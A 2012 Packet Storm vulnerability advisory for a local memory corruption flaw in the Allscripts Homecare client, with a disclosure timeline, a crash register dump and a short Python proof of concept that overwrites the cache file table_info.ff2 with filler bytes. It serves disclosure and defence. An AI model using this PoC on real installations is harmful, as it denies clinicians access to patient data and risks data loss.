Allscripts Homecare Client Local Memory Corruption

2012-10-26T00:00:00
ID PACKETSTORM:117708
Type packetstorm
Reporter G13
Modified 2012-10-26T00:00:00

Description

                                        
                                            `# Title: Allscripts Homecare Client Local Memory Corruption table_info.ff2  
# Date: 10/25/12  
# Author: G13  
# Software Link:  
http://www.allscripts.com/en/solutions/post-acute-solutions/homecare/show/overview.html  
# Version: 6.1.0, 7.0.1  
# Category: Application (local)  
# Tested on: Windows 7 Pro 64 Bit  
# dc585  
  
###### Introduction ######  
  
Allscripts Homecare is an industry leading home care system designed  
to improve clinical quality of care, financial  
performance, and operational control for large, integrated home care  
organizations and small home care companies.  
Business, clinical, and scheduling functionality for multiple lines of  
business—home health, hospice, and private  
duty are combined seamlessly in one integrated home care software system.  
  
###### Report Timeline ######  
  
12/22/11 - Discovery  
01/12/12 - Vendor Notification  
10/25/12 - Disclosure  
  
###### Exploit Technique ######  
  
Local  
  
###### Details ######  
  
A Memory Corruption vulnerability was detected in Allscripts Homecare  
6.1.0. The vulnerability is caused by  
processing a corrupt .ff2 file in the program's cache and causing an  
access violation. The specific file is  
table_info.ff2. The cache for this program is where a local copy of  
paitent and system data is stored and  
accessable by users. Corrupting this will deny users access to the  
program and a possible loss of data.  
  
Other versions are possibly affected.  
  
###### Exception Log ######  
  
EAX 00000000  
ECX 00184646  
EDX 41414141  
EBX 006E994F MHC.006E994F  
ESP 0018F244  
EBP 0018F284  
ESI 006E994F MHC.006E994F  
EDI 00000000  
EIP 004040AF MHC.004040AF  
C 0 ES 002B 32bit 0(FFFFFFFF)  
P 1 CS 0023 32bit 0(FFFFFFFF)  
A 0 SS 002B 32bit 0(FFFFFFFF)  
Z 0 DS 002B 32bit 0(FFFFFFFF)  
S 0 FS 0053 32bit FFFDD000(FFF)  
T 0 GS 002B 32bit 0(FFFFFFFF)  
D 0  
O 0 LastErr ERROR_COMMITMENT_LIMIT (000005AF)  
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)  
ST0 empty 0.0  
ST1 empty 0.0  
ST2 empty 0.0  
ST3 empty %#.19L  
ST4 empty 0.0  
ST5 empty 0.0  
ST6 empty 0.0  
ST7 empty %#.19L  
3 2 1 0 E S P U O Z D I  
FST 1020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)  
FCW 137F Prec NEAR,64 Mask 1 1 1 1 1 1  
  
  
###### PoC ######  
  
#!/usr/bin/python  
  
f = open('c:\program files  
(x86)\misys\homecare\client\cache\table_info.ff2','w')  
f.write('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')  
f.close()  
  
  
`